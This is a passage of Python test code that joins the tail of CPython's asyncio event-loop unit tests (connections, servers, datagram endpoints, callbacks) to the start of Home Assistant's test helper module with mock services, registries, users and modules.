        server_hostname='python.org')
    # Next try an explicit server_hostname.
    self.loop._make_ssl_transport.reset_mock()
    coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True,
                                       server_hostname='perl.com')
    transport, _ = self.loop.run_until_complete(coro)
    transport.close()
    self.loop._make_ssl_transport.assert_called_with(
        ANY, ANY, ANY, ANY,
        server_side=False,
        server_hostname='perl.com')
    # Finally try an explicit empty server_hostname.
    self.loop._make_ssl_transport.reset_mock()
    coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True,
                                       server_hostname='')
    transport, _ = self.loop.run_until_complete(coro)
    transport.close()
    self.loop._make_ssl_transport.assert_called_with(ANY, ANY, ANY, ANY,
                                                     server_side=False,
                                                     server_hostname='')
def test_create_connection_no_ssl_server_hostname_errors(self):
    """Without ssl, any non-None server_hostname is a ValueError."""
    # When not using ssl, server_hostname must be None.
    coro = self.loop.create_connection(MyProto, 'python.org', 80,
                                       server_hostname='')
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
    coro = self.loop.create_connection(MyProto, 'python.org', 80,
                                       server_hostname='python.org')
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
    """With ssl, a missing/empty host needs an explicit server_hostname."""
    # When using ssl, server_hostname may be None if host is non-empty.
    coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
    coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
    sock = socket.socket()
    coro = self.loop.create_connection(MyProto, None, None,
                                       ssl=True, sock=sock)
    self.addCleanup(sock.close)
    self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_server_empty_host(self):
    """An empty-string host is passed to getaddrinfo() as None."""
    # if host is empty string use None instead
    host = object()
    @asyncio.coroutine
    def getaddrinfo(*args, **kw):
        nonlocal host
        host = args[0]
        yield from []
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    fut = self.loop.create_server(MyProto, '', 0)
    self.assertRaises(OSError, self.loop.run_until_complete, fut)
    self.assertIsNone(host)
def test_create_server_host_port_sock(self):
    """Passing host/port together with an explicit sock must raise ValueError."""
    fut = self.loop.create_server(
        MyProto, '0.0.0.0', 0, sock=object())
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(fut)
def test_create_server_no_host_port_sock(self):
    """With neither host/port nor sock given, create_server() must fail."""
    fut = self.loop.create_server(MyProto)
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(fut)
def test_create_server_no_getaddrinfo(self):
    """An empty getaddrinfo() result makes create_server() raise OSError."""
    getaddrinfo = self.loop.getaddrinfo = mock.Mock()
    getaddrinfo.return_value = []
    f = self.loop.create_server(MyProto, 'python.org', 0)
    self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
    """reuse_port=True fails when the platform lacks SO_REUSEPORT."""
    m_socket.getaddrinfo = socket.getaddrinfo
    del m_socket.SO_REUSEPORT
    m_socket.socket.return_value = mock.Mock()
    f = self.loop.create_server(
        MyProto, '0.0.0.0', 0, reuse_port=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
    """SO_REUSEPORT merely being defined is not enough; setting it must work."""
    m_socket.getaddrinfo = socket.getaddrinfo
    m_socket.socket.return_value = mock.Mock()
    m_socket.SO_REUSEPORT = -1
    f = self.loop.create_server(
        MyProto, '0.0.0.0', 0, reuse_port=True)
    self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
    """A bind() failure surfaces as OSError and closes the socket."""
    class Err(OSError):
        strerror = 'error'
    m_socket.getaddrinfo.return_value = [
        (2, 1, 6, '', ('127.0.0.1', 10100))]
    m_socket.getaddrinfo._is_coroutine = False
    m_sock = m_socket.socket.return_value = mock.Mock()
    m_sock.bind.side_effect = Err
    fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
    self.assertRaises(OSError, self.loop.run_until_complete, fut)
    self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
    """An empty getaddrinfo() result makes create_datagram_endpoint() raise OSError."""
    m_socket.getaddrinfo.return_value = []
    m_socket.getaddrinfo._is_coroutine = False
    coro = self.loop.create_datagram_endpoint(
        MyDatagramProto, local_addr=('localhost', 0))
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
    """Malformed local_addr values must raise AssertionError."""
    # A bare string and an over-long tuple are both invalid addresses.
    for bad_addr in ('localhost', ('localhost', 1, 2, 3)):
        endpoint_coro = self.loop.create_datagram_endpoint(
            MyDatagramProto, local_addr=bad_addr)
        with self.assertRaises(AssertionError):
            self.loop.run_until_complete(endpoint_coro)
def test_create_datagram_endpoint_connect_err(self):
    """A failing sock_connect() must propagate as OSError."""
    self.loop.sock_connect = mock.Mock(side_effect=OSError)
    endpoint_coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
    with self.assertRaises(OSError):
        self.loop.run_until_complete(endpoint_coro)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
    """socket() failures propagate for both the family and local_addr paths."""
    m_socket.getaddrinfo = socket.getaddrinfo
    m_socket.socket.side_effect = OSError
    for endpoint_kwargs in ({'family': socket.AF_INET},
                            {'local_addr': ('127.0.0.1', 0)}):
        endpoint_coro = self.loop.create_datagram_endpoint(
            asyncio.DatagramProtocol, **endpoint_kwargs)
        with self.assertRaises(OSError):
            self.loop.run_until_complete(endpoint_coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
    """Mixing an IPv4 remote address with an IPv6 local address must fail."""
    endpoint_coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol,
        remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(endpoint_coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
    """A setblocking() failure must raise and close the new socket."""
    m_socket.socket.return_value.setblocking.side_effect = OSError
    coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol, family=socket.AF_INET)
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
    # The half-initialized socket must not be leaked.
    self.assertTrue(
        m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
    """Providing neither an address nor a family is an error."""
    endpoint_coro = self.loop.create_datagram_endpoint(
        asyncio.DatagramProtocol)
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(endpoint_coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
    """A bind() failure must propagate its exception and close the socket."""
    class Err(OSError):
        pass
    m_socket.getaddrinfo = socket.getaddrinfo
    m_sock = m_socket.socket.return_value = mock.Mock()
    m_sock.bind.side_effect = Err
    fut = self.loop.create_datagram_endpoint(
        MyDatagramProto,
        local_addr=('127.0.0.1', 0), family=socket.AF_INET)
    # The original exception type (not a generic OSError) must be raised.
    self.assertRaises(Err, self.loop.run_until_complete, fut)
    # No socket leak on failure.
    self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
    """An endpoint can be built on a caller-supplied, pre-bound socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('127.0.0.1', 0))
    fut = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(create_future=True, loop=self.loop),
        sock=sock)
    transport, protocol = self.loop.run_until_complete(fut)
    transport.close()
    # Wait for the protocol to observe the close before asserting state.
    self.loop.run_until_complete(protocol.done)
    self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_sock_sockopts(self):
    """An explicit sock= is mutually exclusive with every address/option kwarg."""
    class FakeSock:
        type = socket.SOCK_DGRAM

    # Each of these keyword arguments conflicts with sock= and must be
    # rejected with ValueError.
    conflicting_kwargs = (
        {'local_addr': ('127.0.0.1', 0)},
        {'remote_addr': ('127.0.0.1', 0)},
        {'family': 1},
        {'proto': 1},
        {'flags': 1},
        {'reuse_address': True},
        {'reuse_port': True},
        {'allow_broadcast': True},
    )
    for extra_kwargs in conflicting_kwargs:
        fut = self.loop.create_datagram_endpoint(
            MyDatagramProto, sock=FakeSock(), **extra_kwargs)
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(fut)
def test_create_datagram_endpoint_sockopts(self):
    """Socket options are only applied to the endpoint when requested."""
    # Socket options should not be applied unless asked for.
    # SO_REUSEADDR defaults to on for UNIX.
    # SO_REUSEPORT is not available on all platforms.
    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(create_future=True, loop=self.loop),
        local_addr=('127.0.0.1', 0))
    transport, protocol = self.loop.run_until_complete(coro)
    sock = transport.get_extra_info('socket')
    reuse_address_default_on = (
        os.name == 'posix' and sys.platform != 'cygwin')
    reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
    if reuse_address_default_on:
        self.assertTrue(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEADDR))
    else:
        self.assertFalse(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEADDR))
    if reuseport_supported:
        self.assertFalse(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEPORT))
    self.assertFalse(
        sock.getsockopt(
            socket.SOL_SOCKET, socket.SO_BROADCAST))
    transport.close()
    self.loop.run_until_complete(protocol.done)
    self.assertEqual('CLOSED', protocol.state)
    # Second endpoint: explicitly enable every option and verify each is
    # reflected on the underlying socket.
    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(create_future=True, loop=self.loop),
        local_addr=('127.0.0.1', 0),
        reuse_address=True,
        reuse_port=reuseport_supported,
        allow_broadcast=True)
    transport, protocol = self.loop.run_until_complete(coro)
    sock = transport.get_extra_info('socket')
    self.assertTrue(
        sock.getsockopt(
            socket.SOL_SOCKET, socket.SO_REUSEADDR))
    if reuseport_supported:
        self.assertTrue(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEPORT))
    self.assertTrue(
        sock.getsockopt(
            socket.SOL_SOCKET, socket.SO_BROADCAST))
    transport.close()
    self.loop.run_until_complete(protocol.done)
    self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
    """reuse_port=True must fail when SO_REUSEPORT is unavailable."""
    del m_socket.SO_REUSEPORT
    m_socket.socket.return_value = mock.Mock()
    endpoint_coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(loop=self.loop),
        local_addr=('127.0.0.1', 0),
        reuse_address=False,
        reuse_port=True)
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(endpoint_coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
    """A literal IP address must be used directly, skipping getaddrinfo()."""
    def getaddrinfo(*args, **kw):
        self.fail('should not have called getaddrinfo')
    m_socket.getaddrinfo = getaddrinfo
    m_socket.socket.return_value.bind = bind = mock.Mock()
    self.loop._add_reader = mock.Mock()
    self.loop._add_reader._is_coroutine = False
    reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(loop=self.loop),
        local_addr=('1.2.3.4', 0),
        reuse_address=False,
        reuse_port=reuseport_supported)
    t, p = self.loop.run_until_complete(coro)
    try:
        # The socket must be bound to the literal address with IPv4/UDP
        # parameters inferred from the address itself.
        bind.assert_called_with(('1.2.3.4', 0))
        m_socket.socket.assert_called_with(family=m_socket.AF_INET,
                                           proto=m_socket.IPPROTO_UDP,
                                           type=m_socket.SOCK_DGRAM)
    finally:
        t.close()
        test_utils.run_briefly(self.loop)  # allow transport to close
def test_accept_connection_retry(self):
    """BlockingIOError from accept() is transient: the socket stays open."""
    listener = mock.Mock()
    listener.accept.side_effect = BlockingIOError()
    self.loop._accept_connection(MyProto, listener)
    self.assertFalse(listener.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
    """EMFILE from accept() logs an error, pauses serving, and retries later."""
    sock = mock.Mock()
    sock.fileno.return_value = 10
    sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
    self.loop._remove_reader = mock.Mock()
    self.loop.call_later = mock.Mock()
    self.loop._accept_connection(MyProto, sock)
    self.assertTrue(m_log.error.called)
    # The listening socket stays open; only its reader is removed while
    # accepting is suspended.
    self.assertFalse(sock.close.called)
    self.loop._remove_reader.assert_called_with(10)
    self.loop.call_later.assert_called_with(constants.ACCEPT_RETRY_DELAY,
                                            # self.loop._start_serving
                                            mock.ANY,
                                            MyProto, sock, None, None, mock.ANY)
def test_call_coroutine(self):
    """Coroutine functions and objects are rejected by callback schedulers."""
    @asyncio.coroutine
    def simple_coroutine():
        pass
    self.loop.set_debug(True)
    coro_func = simple_coroutine
    coro_obj = coro_func()
    # Close the never-awaited coroutine to avoid a ResourceWarning.
    self.addCleanup(coro_obj.close)
    for func in (coro_func, coro_obj):
        with self.assertRaises(TypeError):
            self.loop.call_soon(func)
        with self.assertRaises(TypeError):
            self.loop.call_soon_threadsafe(func)
        with self.assertRaises(TypeError):
            self.loop.call_later(60, func)
        with self.assertRaises(TypeError):
            self.loop.call_at(self.loop.time() + 60, func)
        with self.assertRaises(TypeError):
            self.loop.run_in_executor(None, func)
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
    """In debug mode, slow callbacks and tasks are logged with a duration."""
    def stop_loop_cb(loop):
        loop.stop()

    @asyncio.coroutine
    def stop_loop_coro(loop):
        yield from ()
        loop.stop()

    asyncio.set_event_loop(self.loop)
    self.loop.set_debug(True)
    # Zero threshold: every callback counts as "slow".
    self.loop.slow_callback_duration = 0.0
    # slow callback
    self.loop.call_soon(stop_loop_cb, self.loop)
    self.loop.run_forever()
    fmt, *args = m_logger.warning.call_args[0]
    self.assertRegex(fmt % tuple(args),
                     "^Executing <Handle.*stop_loop_cb.*> "
                     "took .* seconds$")
    # slow task
    asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
    self.loop.run_forever()
    fmt, *args = m_logger.warning.call_args[0]
    self.assertRegex(fmt % tuple(args),
                     "^Executing <Task.*stop_loop_coro.*> "
                     "took .* seconds$")
class RunningLoopTests(unittest.TestCase):
    """Tests for nested event-loop detection."""

    def test_running_loop_within_a_loop(self):
        """Starting a loop from inside a running loop must raise RuntimeError."""
        @asyncio.coroutine
        def runner(loop):
            loop.run_forever()
        loop = asyncio.new_event_loop()
        outer_loop = asyncio.new_event_loop()
        try:
            with self.assertRaisesRegex(RuntimeError,
                                        'while another loop is running'):
                outer_loop.run_until_complete(runner(loop))
        finally:
            loop.close()
            outer_loop.close()
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
common.py | """Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
from tests.async_mock import AsyncMock, Mock, patch
_LOGGER = logging.getLogger(__name__)

# Every HomeAssistant instance created by the helpers below is tracked here
# so tests can detect instances that were never closed.
INSTANCES = []

# OAuth client used by auth-related test fixtures.
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
    """Wrap a callback so it can be invoked from any thread.

    The wrapped callback must take ``hass`` as its first argument.
    """

    @ft.wraps(func)
    def wrapper(*args, **kwargs):
        """Run *func* inside the hass event loop and wait for the result."""
        hass = args[0]
        bound_call = ft.partial(func, *args, **kwargs)
        return run_callback_threadsafe(hass.loop, bound_call).result()

    return wrapper
def threadsafe_coroutine_factory(func):
    """Wrap a coroutine function so it can be invoked from any thread.

    The wrapped coroutine must take ``hass`` as its first argument.
    """

    @ft.wraps(func)
    def wrapper(*args, **kwargs):
        """Submit the coroutine to the hass loop and block on the result."""
        hass = args[0]
        future = asyncio.run_coroutine_threadsafe(func(*args, **kwargs), hass.loop)
        return future.result()

    return wrapper
def get_test_config_dir(*add_path):
    """Return the test config dir path, optionally joined with *add_path*."""
    base = os.path.dirname(__file__)
    return os.path.join(base, "testing_config", *add_path)
def get_test_home_assistant():
    """Return a Home Assistant object pointing at test config directory.

    The instance's event loop runs in a dedicated non-daemon thread; the
    returned object's start/stop methods are replaced with threadsafe
    wrappers that drive that loop.
    """
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    hass = loop.run_until_complete(async_test_home_assistant(loop))

    loop_stop_event = threading.Event()

    def run_loop():
        """Run event loop."""
        # pylint: disable=protected-access
        loop._thread_ident = threading.get_ident()
        loop.run_forever()
        loop_stop_event.set()

    orig_stop = hass.stop
    # Redirect the internal "stopped" flag so that setting it stops the
    # loop thread instead of just flipping an event.
    hass._stopped = Mock(set=loop.stop)

    def start_hass(*mocks):
        """Start hass."""
        asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()

    def stop_hass():
        """Stop hass, wait for the loop thread to finish, close the loop."""
        orig_stop()
        loop_stop_event.wait()
        loop.close()

    hass.start = start_hass
    hass.stop = stop_hass

    threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()

    return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
    """Return a Home Assistant object pointing at test config dir.

    Job/task scheduling is wrapped so that plain Mocks are executed
    synchronously and returned as resolved futures, keeping tests
    deterministic.
    """
    hass = ha.HomeAssistant()
    store = auth_store.AuthStore(hass)
    hass.auth = auth.AuthManager(hass, store, {}, {})
    ensure_auth_manager_loaded(hass.auth)
    INSTANCES.append(hass)

    orig_async_add_job = hass.async_add_job
    orig_async_add_executor_job = hass.async_add_executor_job
    orig_async_create_task = hass.async_create_task

    def async_add_job(target, *args):
        """Add job."""
        # Unwrap functools.partial chains so wrapped Mocks are detected.
        check_target = target
        while isinstance(check_target, ft.partial):
            check_target = check_target.func

        # Plain Mocks are called immediately and wrapped in a resolved
        # future; AsyncMocks are awaitable and go through the real path.
        if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
            fut = asyncio.Future()
            fut.set_result(target(*args))
            return fut

        return orig_async_add_job(target, *args)

    def async_add_executor_job(target, *args):
        """Add executor job."""
        check_target = target
        while isinstance(check_target, ft.partial):
            check_target = check_target.func

        if isinstance(check_target, Mock):
            fut = asyncio.Future()
            fut.set_result(target(*args))
            return fut

        return orig_async_add_executor_job(target, *args)

    def async_create_task(coroutine):
        """Create task."""
        if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
            fut = asyncio.Future()
            fut.set_result(None)
            return fut

        return orig_async_create_task(coroutine)

    hass.async_add_job = async_add_job
    hass.async_add_executor_job = async_add_executor_job
    hass.async_create_task = async_create_task

    hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}

    # Fixed test location/config so tests are reproducible.
    hass.config.location_name = "test home"
    hass.config.config_dir = get_test_config_dir()
    hass.config.latitude = 32.87336
    hass.config.longitude = -117.22743
    hass.config.elevation = 0
    hass.config.time_zone = date_util.get_time_zone("US/Pacific")
    hass.config.units = METRIC_SYSTEM
    hass.config.media_dirs = {"local": get_test_config_dir("media")}
    hass.config.skip_pip = True

    hass.config_entries = config_entries.ConfigEntries(hass, {})
    hass.config_entries._entries = []
    hass.config_entries._store._async_ensure_stop_listener = lambda: None

    hass.state = ha.CoreState.running

    # Mock async_start
    orig_start = hass.async_start

    async def mock_async_start():
        """Start the mocking."""
        # We only mock time during tests and we want to track tasks
        with patch("homeassistant.core._async_create_timer"), patch.object(
            hass, "async_stop_track_tasks"
        ):
            await orig_start()

    hass.async_start = mock_async_start

    @ha.callback
    def clear_instance(event):
        """Clear global instance."""
        INSTANCES.remove(hass)

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)

    return hass
def async_mock_service(hass, domain, service, schema=None):
    """Set up a fake service and return the list of captured calls."""
    service_calls = []

    @ha.callback
    def _record_call(call):  # pylint: disable=unnecessary-lambda
        """Record one service call."""
        service_calls.append(call)

    hass.services.async_register(domain, service, _record_call, schema=schema)

    return service_calls


mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
    """Set up a fake intent handler and return the list of handled intents."""
    intents = []

    class MockIntentHandler(intent.IntentHandler):
        # Only intents of this type are routed to this handler.
        intent_type = intent_typ

        async def async_handle(self, intent):
            """Handle the intent."""
            intents.append(intent)
            return intent.create_response()

    intent.async_register(hass, MockIntentHandler())

    return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
    """Fire the MQTT message."""
    # The MQTT handler expects raw bytes on the wire.
    if isinstance(payload, str):
        payload = payload.encode("utf-8")
    hass.data["mqtt"]._mqtt_handle_message(
        Message(topic, payload, qos, retain)
    )


fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
    """Fire a time changed event and run timer callbacks that are due."""
    hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})

    # Walk the loop's scheduled timer handles (private API) and fire those
    # that would be due at the mocked time, or all of them when fire_all.
    for task in list(hass.loop._scheduled):
        if not isinstance(task, asyncio.TimerHandle):
            continue
        if task.cancelled():
            continue

        mock_seconds_into_future = datetime_.timestamp() - time.time()
        future_seconds = task.when() - hass.loop.time()

        if fire_all or mock_seconds_into_future >= future_seconds:
            # Patch the event helper's notion of "now" so fired callbacks
            # observe the mocked time, then run and cancel the handle.
            with patch(
                "homeassistant.helpers.event.time_tracker_utcnow",
                return_value=date_util.as_utc(datetime_),
            ):
                task._run()
                task.cancel()


fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
    """Fire a platform-discovered event on the bus (threadsafe variant)."""
    hass.bus.fire(
        EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
    )
@ha.callback
def async_fire_service_discovered(hass, service, info):
    """Fire a platform-discovered event on the bus."""
    hass.bus.async_fire(
        EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
    )
def load_fixture(filename):
    """Load a fixture file from the tests/fixtures directory."""
    fixture_path = pathlib.Path(__file__).parent / "fixtures" / filename
    return fixture_path.read_text(encoding="utf-8")
def mock_state_change_event(hass, new_state, old_state=None):
    """Fire a mocked state changed event on the bus."""
    event_data = {"entity_id": new_state.entity_id, "new_state": new_state}

    # old_state is optional; omit the key entirely when not provided.
    if old_state:
        event_data["old_state"] = old_state

    hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
    """Mark *component* as set up, failing if it already was.

    Raises AssertionError when the integration is already registered.
    """
    if component in hass.config.components:
        # BUGFIX: the exception was previously constructed but never
        # raised, so the duplicate-setup guard silently did nothing.
        raise AssertionError(f"Integration {component} is already setup")

    hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
    """Mock the Entity Registry, optionally pre-populated with entries."""
    registry = entity_registry.EntityRegistry(hass)
    registry.entities = mock_entries or OrderedDict()
    # Rebuild the internal lookup index after swapping the entries dict.
    registry._rebuild_index()

    hass.data[entity_registry.DATA_REGISTRY] = registry
    return registry
def mock_area_registry(hass, mock_entries=None):
    """Mock the Area Registry, optionally pre-populated with areas."""
    registry = area_registry.AreaRegistry(hass)
    registry.areas = mock_entries or OrderedDict()

    hass.data[area_registry.DATA_REGISTRY] = registry
    return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
    """Mock the Device Registry, optionally pre-populated with devices."""
    registry = device_registry.DeviceRegistry(hass)
    registry.devices = mock_entries or OrderedDict()
    registry.deleted_devices = mock_deleted_entries or OrderedDict()
    # Rebuild the internal lookup index after swapping the dicts.
    registry._rebuild_index()

    hass.data[device_registry.DATA_REGISTRY] = registry
    return registry
class MockGroup(auth_models.Group):
    """Mock a group in Home Assistant."""

    def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
        """Mock a group."""
        kwargs = {"name": name, "policy": policy}
        # Only forward `id` when given so the model can generate its own.
        if id is not None:
            kwargs["id"] = id

        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Test helper to add the group directly to an auth store."""
        ensure_auth_manager_loaded(auth_mgr)
        auth_mgr._store._groups[self.id] = self
        return self
class MockUser(auth_models.User):
    """Mock a user in Home Assistant."""

    def __init__(
        self,
        id=None,
        is_owner=False,
        is_active=True,
        name="Mock User",
        system_generated=False,
        groups=None,
    ):
        """Initialize mock user."""
        kwargs = {
            "is_owner": is_owner,
            "is_active": is_active,
            "name": name,
            "system_generated": system_generated,
            "groups": groups or [],
            "perm_lookup": None,
        }
        # Only forward `id` when given so the model can generate its own.
        if id is not None:
            kwargs["id"] = id
        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Test helper to add the user directly to an auth store."""
        ensure_auth_manager_loaded(auth_mgr)
        auth_mgr._store._users[self.id] = self
        return self

    def mock_policy(self, policy):
        """Mock a policy for a user."""
        self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
    """Register an auth provider built from *config* and return it.

    Raises ValueError when a provider with the same (type, id) already
    exists on the auth manager.
    """
    provider = await auth_providers.auth_provider_from_config(
        hass, hass.auth._store, config
    )
    assert provider is not None, "Invalid config specified"
    key = (provider.type, provider.id)
    providers = hass.auth._providers

    if key in providers:
        raise ValueError("Provider already registered")

    providers[key] = provider
    return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
    """Ensure an auth manager is considered loaded."""
    store = auth_mgr._store
    # An unloaded store has users=None; seed it with defaults instead of
    # hitting storage.
    if store._users is None:
        store._set_defaults()
class MockModule:
    """Representation of a fake module."""

    # pylint: disable=invalid-name
    def __init__(
        self,
        domain=None,
        dependencies=None,
        setup=None,
        requirements=None,
        config_schema=None,
        platform_schema=None,
        platform_schema_base=None,
        async_setup=None,
        async_setup_entry=None,
        async_unload_entry=None,
        async_migrate_entry=None,
        async_remove_entry=None,
        partial_manifest=None,
    ):
        """Initialize the mock module."""
        self.__name__ = f"homeassistant.components.{domain}"
        self.__file__ = f"homeassistant/components/{domain}"
        self.DOMAIN = domain
        self.DEPENDENCIES = dependencies or []
        self.REQUIREMENTS = requirements or []
        # Overlay to be used when generating manifest from this module
        self._partial_manifest = partial_manifest

        # Optional hooks are only set when provided so `hasattr` checks in
        # the loader behave the same as for a real integration module.
        if config_schema is not None:
            self.CONFIG_SCHEMA = config_schema

        if platform_schema is not None:
            self.PLATFORM_SCHEMA = platform_schema

        if platform_schema_base is not None:
            self.PLATFORM_SCHEMA_BASE = platform_schema_base

        if setup is not None:
            # We run this in executor, wrap it in function
            self.setup = lambda *args: setup(*args)

        if async_setup is not None:
            self.async_setup = async_setup

        # Default to a successful async setup when neither hook was given.
        if setup is None and async_setup is None:
            self.async_setup = AsyncMock(return_value=True)

        if async_setup_entry is not None:
            self.async_setup_entry = async_setup_entry

        if async_unload_entry is not None:
            self.async_unload_entry = async_unload_entry

        if async_migrate_entry is not None:
            self.async_migrate_entry = async_migrate_entry

        if async_remove_entry is not None:
            self.async_remove_entry = async_remove_entry

    def mock_manifest(self):
        """Generate a mock manifest to represent this module."""
        return {
            **loader.manifest_from_legacy_module(self.DOMAIN, self),
            **(self._partial_manifest or {}),
        }
class MockPlatform:
    """Provide a fake platform."""

    __name__ = "homeassistant.components.light.bla"
    __file__ = "homeassistant/components/blah/light"

    # pylint: disable=invalid-name
    def __init__(
        self,
        setup_platform=None,
        dependencies=None,
        platform_schema=None,
        async_setup_platform=None,
        async_setup_entry=None,
        scan_interval=None,
    ):
        """Initialize the platform."""
        self.DEPENDENCIES = dependencies or []

        # Optional hooks are only set when provided so `hasattr` checks in
        # entity_platform behave like they would for a real platform.
        if platform_schema is not None:
            self.PLATFORM_SCHEMA = platform_schema

        if scan_interval is not None:
            self.SCAN_INTERVAL = scan_interval

